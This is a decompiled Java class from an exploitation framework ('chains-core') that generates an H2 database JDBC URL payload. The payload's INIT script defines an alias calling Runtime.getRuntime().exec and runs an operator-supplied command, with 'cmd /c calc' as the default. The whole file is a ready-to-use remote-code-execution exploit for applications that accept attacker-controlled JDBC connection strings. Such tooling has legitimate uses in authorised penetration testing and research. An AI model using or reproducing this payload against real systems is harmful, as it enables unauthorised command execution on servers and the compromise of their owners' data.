package com.ar3h.chains.gadget.impl.common.jdbc.h2;

import com.ar3h.chains.common.ContextTag;
import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;

@GadgetAnnotation(name = "H2 JDBC URL Java命令执行1", description = "适用于jdbc rce场景，通过H2执行Java代码，这里采用了最简单的getRuntime去执行命令，Payload比较简短", dependencies = {"com.h2database:h2:org.h2.Driver"}, priority = 10)
@GadgetTags(tags = {Tag.H2JdbcUrl, Tag.JdbcUrlChains, Tag.END})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/jdbc/h2/H2JavaExecJdbc1.class */
public class H2JavaExecJdbc1 implements Gadget {

    @Param(name = "命令", description = "eg: cmd /c calc")
    public String cmd = "cmd /c calc";
    public String driverClassName = "org.h2.Driver";

    public String getObject() {
        return "jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=CREATE ALIAS EXEC AS 'void cmd_exec(String cmd) throws java.lang.Exception {Runtime.getRuntime().exec(cmd)\\;}'\\;CALL EXEC ('" + this.cmd + "')\\;";
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        gadgetContext.put(ContextTag.DRIVER_CLASS_NAME_KEY, this.driverClassName);
        return getObject();
    }
}
